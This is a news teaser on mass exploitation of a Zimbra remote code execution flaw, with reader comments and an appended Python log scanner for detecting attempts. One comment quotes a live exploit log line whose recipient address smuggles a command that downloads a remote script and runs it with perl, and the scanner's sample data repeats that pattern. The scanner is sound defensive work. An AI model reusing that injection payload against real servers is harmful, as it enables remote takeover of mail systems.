'Patch yesterday': Zimbra mail servers under siege through RCE vuln

"Patch yesterday" is the advice from infosec researchers as the latest critical vulnerability affecting Zimbra mail servers is now being mass-exploited. The remote code execution vulnerability (CVE-2024-45519) was disclosed on September 27, along with a proof of concept (PoC) exploit, and Proofpoint reports that attacks using …

  1. Gordon Shumway

    Zimbra4Shell!

    Who'd have thought the concept would become popular?

  2. firstnamebunchofnumbers

    Still going?

    Great to know Zimbra is still going, to be honest. I used to quite like running/using it, was a decent option for self-hosted e-mail in the days before hosted providers offering 50GB+ mailboxes.

    1. Anonymous Coward

      Re: Still going?

      Same here. Alas our organization switched to Microsoft years ago and it's generally been a shit show ever since.

  3. Kevin McMurtrie Silver badge

    I was wondering what this worked on

    Seen in my logs:

    NOQUEUE: reject: RCPT from RB61004.rapidns.com[43.240.65.221]: 554 5.7.1 Service unavailable; Client host [43.240.65.221] blocked using zen.spamhaus.org; Listed by CSS, see https://check.spamhaus.org/query/ip/43.240.65.221; from=<exploit@mail.domain.com> to=<"exploit$(bash -c 'wget -qO - http://108.179.211.43/foxx|perl')"@mail.domain.com> proto=ESMTP helo=<localhost>

    1. Yorick Hunt Silver badge

      Re: I was wondering what this worked on

      Quite a lengthy script there with copious comments in Portuguese (I'd guess Brazilian).

      Can't be arsed trying to analyse it on my 'phone, but you can be sure it's not a simple "Hellorld" trinket.
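
A log check for the kind of rejected RCPT line quoted in the thread above, as an added example that is not part of any commenter's post: it scans Postfix smtpd lines for command-substitution syntax in the envelope `from=`/`to=` fields and reports the connecting client. The sample lines are constructed (example.com and documentation IP ranges), and the function name and patterns are this example's own assumptions, a heuristic rather than a vendor signature.

```python
import re

# Constructed sample lines modelled on the Postfix reject quoted in the thread.
# Hosts use example.com and the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
Oct  2 10:01:07 mx postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[192.0.2.10]: 554 5.7.1 Service unavailable; from=<exploit@mail.example.com> to=<"exploit$(bash -c 'wget -qO - http://198.51.100.7/sample|perl')"@mail.example.com> proto=ESMTP helo=<localhost>
Oct  2 10:02:11 mx postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[192.0.2.11]: 550 5.1.1 <bob@mail.example.com>: Recipient address rejected; from=<alice@example.org> to=<bob@mail.example.com> proto=ESMTP helo=<mail.example.org>
Oct  2 10:03:40 mx postfix/smtpd[2107]: NOQUEUE: reject: RCPT from unknown[192.0.2.12]: 554 5.7.1 Relay access denied; from=<news@example.org> to=<bob+lists@mail.example.com> proto=ESMTP helo=<mail.example.org>
"""

# Envelope fields as Postfix logs them: from=<...> and to=<...>, each followed
# by another key=value pair or the end of the line.
FIELD_RE = re.compile(r'\b(from|to)=<(.*?)>(?=\s+\w+=|\s*$)')
# Connecting client: "RCPT from hostname[ip]"
CLIENT_RE = re.compile(r'\bfrom (\S+?)\[([0-9A-Fa-f.:]+)\]')
# Shell command/parameter substitution syntax inside an address (heuristic).
SHELL_RE = re.compile(r'\$\(|\$\{|`')


def find_suspicious(log_text):
    """Return one dict per envelope address that contains shell substitution syntax."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        client = CLIENT_RE.search(line)
        for field, addr in FIELD_RE.findall(line):
            if SHELL_RE.search(addr):
                hits.append({
                    "line": lineno,
                    "field": field,
                    "client_ip": client.group(2) if client else None,
                    "address": addr,
                })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['field']}= from client "
              f"{hit['client_ip']}: {hit['address']}")
```

A hit on a rejected line, as in the comment, means the attempt was blocked at the SMTP stage; the same pattern on an accepted delivery is the case to escalate.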
